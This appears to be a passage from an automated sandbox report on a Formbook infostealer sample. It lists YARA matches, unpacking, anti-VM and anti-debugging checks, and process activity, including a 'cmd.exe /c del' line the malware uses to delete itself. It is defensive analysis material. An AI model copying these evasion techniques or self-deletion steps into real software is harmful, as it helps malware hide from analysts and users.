          Source: 00000001.00000002.387989609.00000000006A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.387989609.00000000006A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.4oItdZkNOZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.4oItdZkNOZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.4oItdZkNOZ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.4oItdZkNOZ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.4oItdZkNOZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.4oItdZkNOZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.4oItdZkNOZ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.4oItdZkNOZ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.4oItdZkNOZ.exe.26a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.4oItdZkNOZ.exe.26a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.4oItdZkNOZ.exe.26a0000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.4oItdZkNOZ.exe.26a0000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@15/9
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:952:120:WilError_01
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeFile created: C:\Users\user\AppData\Local\Temp\nsa770C.tmpJump to behavior
          Source: 4oItdZkNOZ.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 4oItdZkNOZ.exeVirustotal: Detection: 30%
          Source: 4oItdZkNOZ.exeReversingLabs: Detection: 33%
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeFile read: C:\Users\user\Desktop\4oItdZkNOZ.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\4oItdZkNOZ.exe 'C:\Users\user\Desktop\4oItdZkNOZ.exe'
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeProcess created: C:\Users\user\Desktop\4oItdZkNOZ.exe 'C:\Users\user\Desktop\4oItdZkNOZ.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\4oItdZkNOZ.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeProcess created: C:\Users\user\Desktop\4oItdZkNOZ.exe 'C:\Users\user\Desktop\4oItdZkNOZ.exe'
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\4oItdZkNOZ.exe'
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: cscript.pdbUGP source: 4oItdZkNOZ.exe, 00000001.00000002.388207380.0000000000A60000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.366018539.0000000007AA0000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 4oItdZkNOZ.exe, 00000000.00000003.341988783.000000001EFD0000.00000004.00000001.sdmp, 4oItdZkNOZ.exe, 00000001.00000002.388229067.0000000000B10000.00000040.00000001.sdmp, cscript.exe, 00000003.00000002.604526316.0000000004B3F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 4oItdZkNOZ.exe, cscript.exe
          Source: Binary string: cscript.pdb source: 4oItdZkNOZ.exe, 00000001.00000002.388207380.0000000000A60000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.366018539.0000000007AA0000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeUnpacked PE file: 1.2.4oItdZkNOZ.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: m9c3uhgbfqo.dll.0.drStatic PE information: section name: .code
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00415047 pushad ; ret
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_0041600E pushad ; retf
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00411254 push edi; ret
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00414D4F push FFFFFFA9h; ret
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B8D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_1_00415047 pushad ; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A9D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_02B6C2CD push ss; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_02B61254 push edi; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_02B6B3B5 push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_02B6600E pushad ; retf
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_02B50008 push ss; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_02B65047 pushad ; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_02B6B402 push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_02B6B40B push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_02B6B46C push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_02B64D4F push FFFFFFA9h; ret
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeFile created: C:\Users\user\AppData\Local\Temp\nsv773C.tmp\m9c3uhgbfqo.dllJump to dropped file
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000002B585E4 second address: 0000000002B585EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000002B5897E second address: 0000000002B58984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_004088B0 rdtsc
          Source: C:\Windows\explorer.exe TID: 244Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\cscript.exe TID: 5772Thread sleep time: -44000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 0_2_004026BC FindFirstFileA,
          Source: explorer.exe, 00000002.00000000.367245380.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000002.00000000.367199295.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000000.367881772.0000000008540000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.360675289.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.362134122.000000000640E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.367199295.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000002.00000000.362134122.000000000640E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.367028557.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000002.00000000.360675289.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.360675289.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.367028557.00000000082E2000.00000004.00000001.sdmpBinary or memory string: 0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.367028557.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000002.00000000.367245380.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000002.00000002.603524845.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 00000002.00000000.360675289.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 0_2_709B1000 Rcxlxosdkhvclf,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,VirtualProtect,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 0_2_026918CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 0_2_026916B4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B790AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B39080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B340E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B340E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B340E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B358EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BCB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C01074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C04015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C04015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B50050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B50050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B62990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B5C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B3B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B3B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B3B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BC41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B54120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B39100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B39100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B39100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B3B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B3B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B3C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B5B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B5B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B4AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B4AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B352A5 mov eax, dword ptr fs:[00000030h]
